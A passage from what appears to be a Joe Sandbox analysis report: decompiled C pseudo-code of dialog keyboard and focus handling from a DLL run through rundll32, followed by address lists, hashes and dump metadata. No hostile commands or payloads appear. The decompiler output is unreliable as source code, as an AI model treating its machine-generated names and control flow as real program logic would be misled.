                                                                                                                      							_t238 = _t258;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				L10:
                                                                                                                      				_t247 = 0;
                                                                                                                      				while(1) {
                                                                                                                      					_t238 = E1002A627(_t232, _a4, _t238, _a12);
                                                                                                                      					if(_t238 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_t142 = E1002A0D2(_t238);
                                                                                                                      					_pop(_t232);
                                                                                                                      					if(_t142 == 0) {
                                                                                                                      						L14:
                                                                                                                      						if(_t238 == 0) {
                                                                                                                      							L21:
                                                                                                                      							__eflags =  *(_t238 + 4);
                                                                                                                      							if( *(_t238 + 4) == 0) {
                                                                                                                      								E100201F1(_t232);
                                                                                                                      								asm("int3");
                                                                                                                      								_push(0x28);
                                                                                                                      								E10030D5A(E10044D1A, 0, _t238, _t247);
                                                                                                                      								_t146 = _a4;
                                                                                                                      								__eflags = _t146;
                                                                                                                      								if(_t146 != 0) {
                                                                                                                      									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                      								} else {
                                                                                                                      									_v48 = _v48 & _t146;
                                                                                                                      								}
                                                                                                                      								_t240 = _a8;
                                                                                                                      								_t249 = _t240->message;
                                                                                                                      								_v32 = _t249;
                                                                                                                      								_v52 = GetFocus();
                                                                                                                      								_t149 = E1001B042(0, _t260, _t148);
                                                                                                                      								_t229 = 0x100;
                                                                                                                      								__eflags = _t249 - 0x100;
                                                                                                                      								_v24 = _t149;
                                                                                                                      								if(_t249 < 0x100) {
                                                                                                                      									L34:
                                                                                                                      									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                      									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                      										goto L56;
                                                                                                                      									} else {
                                                                                                                      										goto L35;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t249 - 0x109;
                                                                                                                      									if(_t249 <= 0x109) {
                                                                                                                      										L35:
                                                                                                                      										__eflags = _t149;
                                                                                                                      										if(_t149 == 0) {
                                                                                                                      											L56:
                                                                                                                      											_t251 = 0;
                                                                                                                      											_v28 = 0;
                                                                                                                      											_t150 = E1001B042(_t229, _t260,  *_t240);
                                                                                                                      											_v44 = _v44 & 0;
                                                                                                                      											_v36 = _t150;
                                                                                                                      											_t152 = _v32 - _t229;
                                                                                                                      											__eflags = _t152;
                                                                                                                      											_v40 = 2;
                                                                                                                      											if(_t152 == 0) {
                                                                                                                      												_t153 = E1002A085(_v36, _t240);
                                                                                                                      												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                      												__eflags = _t232 - 0x1b;
                                                                                                                      												if(__eflags > 0) {
                                                                                                                      													__eflags = _t232 - 0x25;
                                                                                                                      													if(_t232 < 0x25) {
                                                                                                                      														goto L75;
                                                                                                                      													} else {
                                                                                                                      														__eflags = _t232 - 0x26;
                                                                                                                      														if(_t232 <= 0x26) {
                                                                                                                      															_v44 = 1;
                                                                                                                      															goto L110;
                                                                                                                      														} else {
                                                                                                                      															__eflags = _t232 - 0x28;
                                                                                                                      															if(_t232 <= 0x28) {
                                                                                                                      																L110:
                                                                                                                      																_t171 = E1002A085(_v24, _t240);
                                                                                                                      																__eflags = _t171 & 0x00000001;
                                                                                                                      																if((_t171 & 0x00000001) != 0) {
                                                                                                                      																	goto L75;
                                                                                                                      																} else {
                                                                                                                      																	__eflags = _v44;
                                                                                                                      																	_t232 = _a4;
                                                                                                                      																	_push(0);
                                                                                                                      																	if(_v44 == 0) {
                                                                                                                      																		_t172 = E1001E706(_t232);
                                                                                                                      																	} else {
                                                                                                                      																		_t172 = E1001E6B8(_t232);
                                                                                                                      																	}
                                                                                                                      																	_t254 = _t172;
                                                                                                                      																	__eflags = _t254;
                                                                                                                      																	if(_t254 == 0) {
                                                                                                                      																		goto L75;
                                                                                                                      																	} else {
                                                                                                                      																		__eflags =  *(_t254 + 8);
                                                                                                                      																		if( *(_t254 + 8) != 0) {
                                                                                                                      																			_t232 = _a4;
                                                                                                                      																			E1001E262(_a4, _t254);
                                                                                                                      																		}
                                                                                                                      																		__eflags =  *(_t254 + 4);
                                                                                                                      																		if( *(_t254 + 4) == 0) {
                                                                                                                      																			_t173 =  *_t254;
                                                                                                                      																			__eflags = _t173;
                                                                                                                      																			if(_t173 == 0) {
                                                                                                                      																				_t232 = _a4;
                                                                                                                      																				_t174 = E1002A143(_a4, _v24, _v44);
                                                                                                                      																			} else {
                                                                                                                      																				_t174 = E1001B042(_t229, _t260, _t173);
                                                                                                                      																			}
                                                                                                                      																			_t242 = _t174;
                                                                                                                      																			__eflags = _t242;
                                                                                                                      																			if(_t242 == 0) {
                                                                                                                      																				goto L75;
                                                                                                                      																			} else {
                                                                                                                      																				_t229 = 0;
                                                                                                                      																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                      																				E1002A17D(_t242);
                                                                                                                      																				__eflags =  *(_t254 + 8);
                                                                                                                      																				if( *(_t254 + 8) != 0) {
                                                                                                                      																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                      																				}
                                                                                                                      																				goto L125;
                                                                                                                      																			}
                                                                                                                      																		} else {
                                                                                                                      																			_t232 =  *(_t254 + 4);
                                                                                                                      																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                      																			goto L125;
                                                                                                                      																		}
                                                                                                                      																	}
                                                                                                                      																}
                                                                                                                      															} else {
                                                                                                                      																__eflags = _t232 - 0x2b;
                                                                                                                      																if(_t232 != 0x2b) {
                                                                                                                      																	goto L75;
                                                                                                                      																} else {
                                                                                                                      																	goto L97;
                                                                                                                      																}
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      													goto L126;
                                                                                                                      												} else {
                                                                                                                      													if(__eflags == 0) {
                                                                                                                      														L103:
                                                                                                                      														_t243 = 0;
                                                                                                                      														__eflags = 0;
                                                                                                                      														goto L104;
                                                                                                                      													} else {
                                                                                                                      														__eflags = _t232 - 3;
                                                                                                                      														if(_t232 == 3) {
                                                                                                                      															goto L103;
                                                                                                                      														} else {
                                                                                                                      															__eflags = _t232 - 9;
                                                                                                                      															if(_t232 == 9) {
                                                                                                                      																__eflags = _t153 & 0x00000002;
                                                                                                                      																if((_t153 & 0x00000002) != 0) {
                                                                                                                      																	goto L75;
                                                                                                                      																} else {
                                                                                                                      																	_t188 = GetKeyState(0x10);
                                                                                                                      																	_t255 = _a4;
                                                                                                                      																	__eflags = _t188;
                                                                                                                      																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                      																	_t232 = _t255;
                                                                                                                      																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
                                                                                                                      																	__eflags = _t189;
                                                                                                                      																	if(_t189 == 0) {
                                                                                                                      																		goto L75;
                                                                                                                      																	} else {
                                                                                                                      																		__eflags =  *(_t189 + 4);
                                                                                                                      																		if( *(_t189 + 4) == 0) {
                                                                                                                      																			_t190 =  *_t189;
                                                                                                                      																			__eflags = _t190;
                                                                                                                      																			if(_t190 == 0) {
                                                                                                                      																				_t232 = _t255;
                                                                                                                      																				_t191 = E10016D48(_t255, _v36, _t229);
                                                                                                                      																			} else {
                                                                                                                      																				_t191 = E1001B042(_t229, _t260, _t190);
                                                                                                                      																			}
                                                                                                                      																			_t244 = _t191;
                                                                                                                      																			__eflags = _t244;
                                                                                                                      																			if(_t244 != 0) {
                                                                                                                      																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                      																				E1002A17D(_t244);
                                                                                                                      																				E1002A347(_t229, _t232, _t260, _v24, _t244);
                                                                                                                      																				_pop(_t232);
                                                                                                                      																			}
                                                                                                                      																		} else {
                                                                                                                      																			_t195 =  *(_t189 + 4);
                                                                                                                      																			_t232 = _t195;
                                                                                                                      																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                      																		}
                                                                                                                      																		goto L125;
                                                                                                                      																	}
                                                                                                                      																}
                                                                                                                      																goto L126;
                                                                                                                      															} else {
                                                                                                                      																__eflags = _t232 - 0xd;
                                                                                                                      																if(_t232 == 0xd) {
                                                                                                                      																	L97:
                                                                                                                      																	__eflags = _t153 & 0x00000004;
                                                                                                                      																	if((_t153 & 0x00000004) != 0) {
                                                                                                                      																		goto L75;
                                                                                                                      																	} else {
                                                                                                                      																		_t182 = E1002A122(_v24);
                                                                                                                      																		__eflags = _t182 & 0x00000010;
                                                                                                                      																		_pop(_t232);
                                                                                                                      																		if((_t182 & 0x00000010) == 0) {
                                                                                                                      																			_t183 = E1002A4C8(_a4);
                                                                                                                      																		} else {
                                                                                                                      																			_t251 = _v24;
                                                                                                                      																			_t232 = _t251;
                                                                                                                      																			_t183 = E1001DE35(_t251);
                                                                                                                      																		}
                                                                                                                      																		_t243 = 0;
                                                                                                                      																		__eflags = _t251;
                                                                                                                      																		_v40 = _t183;
                                                                                                                      																		if(_t251 != 0) {
                                                                                                                      																			L105:
                                                                                                                      																			_t232 = _t251;
                                                                                                                      																			_t184 = E1001DEAF(_t251);
                                                                                                                      																			__eflags = _t184;
                                                                                                                      																			if(_t184 != 0) {
                                                                                                                      																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                      																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                      																					goto L75;
                                                                                                                      																				} else {
                                                                                                                      																					_push(_t243);
                                                                                                                      																					_push(_t243);
                                                                                                                      																					_push(_t243);
                                                                                                                      																					_push(1);
                                                                                                                      																					_push(0xfffffdd9);
                                                                                                                      																					_push(_t251);
                                                                                                                      																					_v8 = _t243;
                                                                                                                      																					E1001DF0C();
                                                                                                                      																					_v8 = _v8 | 0xffffffff;
                                                                                                                      																					goto L125;
                                                                                                                      																				}
                                                                                                                      																			} else {
                                                                                                                      																				MessageBeep(_t243);
                                                                                                                      																				goto L75;
                                                                                                                      																			}
                                                                                                                      																		} else {
                                                                                                                      																			L104:
                                                                                                                      																			_t251 = E1002A3C2(_a4, _v40);
                                                                                                                      																			__eflags = _t251 - _t243;
                                                                                                                      																			if(_t251 == _t243) {
                                                                                                                      																				goto L75;
                                                                                                                      																			} else {
                                                                                                                      																				goto L105;
                                                                                                                      																			}
                                                                                                                      																		}
                                                                                                                      																	}
                                                                                                                      																	goto L126;
                                                                                                                      																} else {
                                                                                                                      																	goto L75;
                                                                                                                      																}
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												goto L79;
                                                                                                                      											} else {
                                                                                                                      												_t198 = _t152;
                                                                                                                      												__eflags = _t198;
                                                                                                                      												if(_t198 == 0) {
                                                                                                                      													L62:
                                                                                                                      													_t199 = E1002A085(_v36, _t240);
                                                                                                                      													__eflags = _v32 - 0x102;
                                                                                                                      													if(_v32 != 0x102) {
                                                                                                                      														L64:
                                                                                                                      														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                      														__eflags = _t232 - 9;
                                                                                                                      														if(_t232 != 9) {
                                                                                                                      															L66:
                                                                                                                      															__eflags = _t232 - 0x20;
                                                                                                                      															if(__eflags == 0) {
                                                                                                                      																goto L54;
                                                                                                                      															} else {
                                                                                                                      																_push(_t240);
                                                                                                                      																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                      																__eflags = _t200;
                                                                                                                      																if(_t200 == 0) {
                                                                                                                      																	goto L75;
                                                                                                                      																} else {
                                                                                                                      																	_t201 =  *(_t200 + 4);
                                                                                                                      																	__eflags = _t201;
                                                                                                                      																	if(_t201 == 0) {
                                                                                                                      																		goto L75;
                                                                                                                      																	} else {
                                                                                                                      																		_t232 = _t201;
                                                                                                                      																		E100246E1(_t201, _t240);
                                                                                                                      																		L125:
                                                                                                                      																		_v28 = 1;
                                                                                                                      																	}
                                                                                                                      																}
                                                                                                                      																goto L79;
                                                                                                                      															}
                                                                                                                      														} else {
                                                                                                                      															__eflags = _t199 & 0x00000002;
                                                                                                                      															if((_t199 & 0x00000002) != 0) {
                                                                                                                      																goto L75;
                                                                                                                      															} else {
                                                                                                                      																goto L66;
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														__eflags = _t199 & 0x00000084;
                                                                                                                      														if((_t199 & 0x00000084) != 0) {
                                                                                                                      															goto L75;
                                                                                                                      														} else {
                                                                                                                      															goto L64;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													__eflags = _t198 != 4;
                                                                                                                      													if(_t198 != 4) {
                                                                                                                      														L75:
                                                                                                                      														_t154 = _a4;
                                                                                                                      														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                      														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                      															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                      															__eflags = _t165;
                                                                                                                      															_v28 = _t165;
                                                                                                                      															if(_t165 != 0) {
                                                                                                                      																_t167 = E1001B042(_t229, _t260, GetFocus());
                                                                                                                      																__eflags = _t167 - _v24;
                                                                                                                      																if(_t167 != _v24) {
                                                                                                                      																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                      																	_pop(_t232);
                                                                                                                      																}
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      														L79:
                                                                                                                      														_t155 = IsWindow(_v52);
                                                                                                                      														__eflags = _t155;
                                                                                                                      														if(_t155 != 0) {
                                                                                                                      															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                      															_t161 = IsWindow(_v48);
                                                                                                                      															__eflags = _t161;
                                                                                                                      															if(_t161 != 0) {
                                                                                                                      																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      														_t156 = _v28;
                                                                                                                      													} else {
                                                                                                                      														__eflags = _v24;
                                                                                                                      														if(_v24 != 0) {
                                                                                                                      															L61:
                                                                                                                      															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                      															if( *(_t240 + 8) == 0x20) {
                                                                                                                      																goto L75;
                                                                                                                      															} else {
                                                                                                                      																goto L62;
                                                                                                                      															}
                                                                                                                      														} else {
                                                                                                                      															_t204 = GetKeyState(0x12);
                                                                                                                      															__eflags = _t204;
                                                                                                                      															if(_t204 >= 0) {
                                                                                                                      																goto L75;
                                                                                                                      															} else {
                                                                                                                      																goto L61;
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t256 = _t149;
                                                                                                                      											while(1) {
                                                                                                                      												__eflags =  *(_t256 + 0x50);
                                                                                                                      												if( *(_t256 + 0x50) != 0) {
                                                                                                                      													break;
                                                                                                                      												}
                                                                                                                      												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                      												__eflags = _t211 - _a4;
                                                                                                                      												if(_t211 != _a4) {
                                                                                                                      													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                      													__eflags = _t256;
                                                                                                                      													if(_t256 != 0) {
                                                                                                                      														continue;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												break;
                                                                                                                      											}
                                                                                                                      											__eflags = _t256;
                                                                                                                      											if(_t256 == 0) {
                                                                                                                      												L45:
                                                                                                                      												__eflags = _v32 - 0x101;
                                                                                                                      												if(_v32 == 0x101) {
                                                                                                                      													L48:
                                                                                                                      													__eflags = _t256;
                                                                                                                      													if(_t256 == 0) {
                                                                                                                      														goto L55;
                                                                                                                      													} else {
                                                                                                                      														_t257 =  *(_t256 + 0x50);
                                                                                                                      														__eflags = _t257;
                                                                                                                      														if(_t257 == 0) {
                                                                                                                      															goto L55;
                                                                                                                      														} else {
                                                                                                                      															_t206 = _a8->wParam & 0x0000ffff;
                                                                                                                      															__eflags = _t206 - 0xd;
                                                                                                                      															if(_t206 != 0xd) {
                                                                                                                      																L52:
                                                                                                                      																__eflags = _t206 - 0x1b;
                                                                                                                      																if(_t206 != 0x1b) {
                                                                                                                      																	goto L55;
                                                                                                                      																} else {
                                                                                                                      																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                      																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                      																		goto L55;
                                                                                                                      																	} else {
                                                                                                                      																		goto L54;
                                                                                                                      																	}
                                                                                                                      																}
                                                                                                                      															} else {
                                                                                                                      																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                      																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                      																	L54:
                                                                                                                      																	_t156 = 0;
                                                                                                                      																} else {
                                                                                                                      																	goto L52;
                                                                                                                      																}
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													__eflags = _v32 - _t229;
                                                                                                                      													if(_v32 == _t229) {
                                                                                                                      														goto L48;
                                                                                                                      													} else {
                                                                                                                      														__eflags = _v32 - 0x102;
                                                                                                                      														if(_v32 != 0x102) {
                                                                                                                      															L55:
                                                                                                                      															_t240 = _a8;
                                                                                                                      															goto L56;
                                                                                                                      														} else {
                                                                                                                      															goto L48;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t207 =  *(_t256 + 0x50);
                                                                                                                      												__eflags = _t207;
                                                                                                                      												if(_t207 == 0) {
                                                                                                                      													goto L45;
                                                                                                                      												} else {
                                                                                                                      													__eflags =  *(_t207 + 0x58);
                                                                                                                      													if( *(_t207 + 0x58) == 0) {
                                                                                                                      														goto L45;
                                                                                                                      													} else {
                                                                                                                      														_t208 =  *(_t207 + 0x58);
                                                                                                                      														_t232 =  *_t208;
                                                                                                                      														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                      														__eflags = _t209;
                                                                                                                      														if(_t209 != 0) {
                                                                                                                      															goto L45;
                                                                                                                      														} else {
                                                                                                                      															_t156 = _t209 + 1;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										goto L34;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								return E10030DFF(_t156);
                                                                                                                      							} else {
                                                                                                                      								_t232 =  *(_t238 + 4);
                                                                                                                      								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                      								__eflags = _t215 & 0x08000000;
                                                                                                                      								if((_t215 & 0x08000000) == 0) {
                                                                                                                      									goto L20;
                                                                                                                      								} else {
                                                                                                                      									goto L23;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							_t216 =  *(_t238 + 4);
                                                                                                                      							if(_t216 == 0) {
                                                                                                                      								_t217 =  *_t238;
                                                                                                                      							} else {
                                                                                                                      								_t217 =  *(_t216 + 0x24);
                                                                                                                      							}
                                                                                                                      							if(_t217 == 0) {
                                                                                                                      								goto L21;
                                                                                                                      							} else {
                                                                                                                      								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                      									L23:
                                                                                                                      									__eflags = _t238 - _v8;
                                                                                                                      									if(_t238 == _v8) {
                                                                                                                      										break;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _v8;
                                                                                                                      										if(_v8 == 0) {
                                                                                                                      											_v8 = _t238;
                                                                                                                      										}
                                                                                                                      										_t247 = _t247 + 1;
                                                                                                                      										__eflags = _t247 - 0x200;
                                                                                                                      										if(_t247 < 0x200) {
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											break;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									L20:
                                                                                                                      									_t141 = _t238;
                                                                                                                      									L28:
                                                                                                                      									return _t141;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						_t232 = _a4;
                                                                                                                      						_t238 = E1001E11F(_a4, _t238, 0);
                                                                                                                      						if(_t238 == 0) {
                                                                                                                      							break;
                                                                                                                      						} else {
                                                                                                                      							goto L14;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					L126:
                                                                                                                      				}
                                                                                                                      				_t141 = 0;
                                                                                                                      				__eflags = 0;
                                                                                                                      				goto L28;
                                                                                                                      			}
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002ab85
                                                                                                                      0x1002ab7c
                                                                                                                      0x1002ab73
                                                                                                                      0x00000000
                                                                                                                      0x1002aa30
                                                                                                                      0x1002aa30
                                                                                                                      0x1002abbf
                                                                                                                      0x1002abbf
                                                                                                                      0x1002abbf
                                                                                                                      0x00000000
                                                                                                                      0x1002aa36
                                                                                                                      0x1002aa36
                                                                                                                      0x1002aa39
                                                                                                                      0x00000000
                                                                                                                      0x1002aa3f
                                                                                                                      0x1002aa3f
                                                                                                                      0x1002aa42
                                                                                                                      0x1002aae1
                                                                                                                      0x1002aae3
                                                                                                                      0x00000000
                                                                                                                      0x1002aae9
                                                                                                                      0x1002aaeb
                                                                                                                      0x1002aaf1
                                                                                                                      0x1002aaf6
                                                                                                                      0x1002aaf9
                                                                                                                      0x1002aafc
                                                                                                                      0x1002ab01
                                                                                                                      0x1002ab06
                                                                                                                      0x1002ab08
                                                                                                                      0x00000000
                                                                                                                      0x1002ab0e
                                                                                                                      0x1002ab0e
                                                                                                                      0x1002ab12
                                                                                                                      0x1002ab27
                                                                                                                      0x1002ab29
                                                                                                                      0x1002ab2b
                                                                                                                      0x1002ab39
                                                                                                                      0x1002ab3b
                                                                                                                      0x1002ab2d
                                                                                                                      0x1002ab2e
                                                                                                                      0x1002ab2e
                                                                                                                      0x1002ab40
                                                                                                                      0x1002ab42
                                                                                                                      0x1002ab44
                                                                                                                      0x1002ab4d
                                                                                                                      0x1002ab52
                                                                                                                      0x1002ab5b
                                                                                                                      0x1002ab61
                                                                                                                      0x1002ab61
                                                                                                                      0x1002ab14
                                                                                                                      0x1002ab14
                                                                                                                      0x1002ab1a
                                                                                                                      0x1002ab1c
                                                                                                                      0x1002ab1c
                                                                                                                      0x00000000
                                                                                                                      0x1002ab12
                                                                                                                      0x1002ab08
                                                                                                                      0x00000000
                                                                                                                      0x1002aa48
                                                                                                                      0x1002aa48
                                                                                                                      0x1002aa4b
                                                                                                                      0x1002ab8b
                                                                                                                      0x1002ab8b
                                                                                                                      0x1002ab8d
                                                                                                                      0x00000000
                                                                                                                      0x1002ab93
                                                                                                                      0x1002ab96
                                                                                                                      0x1002ab9b
                                                                                                                      0x1002ab9d
                                                                                                                      0x1002ab9e
                                                                                                                      0x1002abaf
                                                                                                                      0x1002aba0
                                                                                                                      0x1002aba0
                                                                                                                      0x1002aba3
                                                                                                                      0x1002aba5
                                                                                                                      0x1002aba5
                                                                                                                      0x1002abb4
                                                                                                                      0x1002abb6
                                                                                                                      0x1002abb8
                                                                                                                      0x1002abbb
                                                                                                                      0x1002abd6
                                                                                                                      0x1002abd6
                                                                                                                      0x1002abd8
                                                                                                                      0x1002abdd
                                                                                                                      0x1002abdf
                                                                                                                      0x1002abed
                                                                                                                      0x1002abf0
                                                                                                                      0x00000000
                                                                                                                      0x1002abf6
                                                                                                                      0x1002abf6
                                                                                                                      0x1002abf7
                                                                                                                      0x1002abf8
                                                                                                                      0x1002abf9
                                                                                                                      0x1002abfb
                                                                                                                      0x1002ac00
                                                                                                                      0x1002ac01
                                                                                                                      0x1002ac04
                                                                                                                      0x1002ac0c
                                                                                                                      0x00000000
                                                                                                                      0x1002ac0c
                                                                                                                      0x1002abe1
                                                                                                                      0x1002abe2
                                                                                                                      0x00000000
                                                                                                                      0x1002abe2
                                                                                                                      0x1002abbd
                                                                                                                      0x1002abc1
                                                                                                                      0x1002abcc
                                                                                                                      0x1002abce
                                                                                                                      0x1002abd0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002abd0
                                                                                                                      0x1002abbb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002aa4b
                                                                                                                      0x1002aa42
                                                                                                                      0x1002aa39
                                                                                                                      0x1002aa30
                                                                                                                      0x00000000
                                                                                                                      0x1002a99a
                                                                                                                      0x1002a99b
                                                                                                                      0x1002a99b
                                                                                                                      0x1002a99c
                                                                                                                      0x1002a9c8
                                                                                                                      0x1002a9cc
                                                                                                                      0x1002a9d1
                                                                                                                      0x1002a9d8
                                                                                                                      0x1002a9de
                                                                                                                      0x1002a9de
                                                                                                                      0x1002a9e2
                                                                                                                      0x1002a9e6
                                                                                                                      0x1002a9ec
                                                                                                                      0x1002a9ec
                                                                                                                      0x1002a9f0
                                                                                                                      0x00000000
                                                                                                                      0x1002a9f6
                                                                                                                      0x1002a9f6
                                                                                                                      0x1002a9fd
                                                                                                                      0x1002aa02
                                                                                                                      0x1002aa04
                                                                                                                      0x00000000
                                                                                                                      0x1002aa06
                                                                                                                      0x1002aa06
                                                                                                                      0x1002aa09
                                                                                                                      0x1002aa0b
                                                                                                                      0x00000000
                                                                                                                      0x1002aa0d
                                                                                                                      0x1002aa0e
                                                                                                                      0x1002aa10
                                                                                                                      0x1002accc
                                                                                                                      0x1002accc
                                                                                                                      0x1002accc
                                                                                                                      0x1002aa0b
                                                                                                                      0x00000000
                                                                                                                      0x1002aa04
                                                                                                                      0x1002a9e8
                                                                                                                      0x1002a9e8
                                                                                                                      0x1002a9ea
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002a9ea
                                                                                                                      0x1002a9da
                                                                                                                      0x1002a9da
                                                                                                                      0x1002a9dc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002a9dc
                                                                                                                      0x1002a99e
                                                                                                                      0x1002a99e
                                                                                                                      0x1002a9a1
                                                                                                                      0x1002aa51
                                                                                                                      0x1002aa51
                                                                                                                      0x1002aa54
                                                                                                                      0x1002aa5a
                                                                                                                      0x1002aa62
                                                                                                                      0x1002aa68
                                                                                                                      0x1002aa6a
                                                                                                                      0x1002aa6d
                                                                                                                      0x1002aa78
                                                                                                                      0x1002aa7d
                                                                                                                      0x1002aa80
                                                                                                                      0x1002aa8b
                                                                                                                      0x1002aa90
                                                                                                                      0x1002aa90
                                                                                                                      0x1002aa80
                                                                                                                      0x1002aa6d
                                                                                                                      0x1002aa91
                                                                                                                      0x1002aa9a
                                                                                                                      0x1002aa9c
                                                                                                                      0x1002aa9e
                                                                                                                      0x1002aab2
                                                                                                                      0x1002aabc
                                                                                                                      0x1002aabe
                                                                                                                      0x1002aac0
                                                                                                                      0x1002aad1
                                                                                                                      0x1002aad1
                                                                                                                      0x1002aac0
                                                                                                                      0x1002aad6
                                                                                                                      0x1002a9a7
                                                                                                                      0x1002a9a7
                                                                                                                      0x1002a9aa
                                                                                                                      0x1002a9bd
                                                                                                                      0x1002a9bd
                                                                                                                      0x1002a9c2
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				struct tagRECT _v28;
                                                                                                                      				struct tagRECT _v44;
                                                                                                                      				struct tagRECT _v60;
                                                                                                                      				struct tagRECT _v80;
                                                                                                                      				char _v100;
                                                                                                                      				void* __edi;
                                                                                                                      				intOrPtr _t58;
                                                                                                                      				struct HWND__* _t59;
                                                                                                                      				intOrPtr _t94;
                                                                                                                      				signed int _t103;
                                                                                                                      				struct HWND__* _t104;
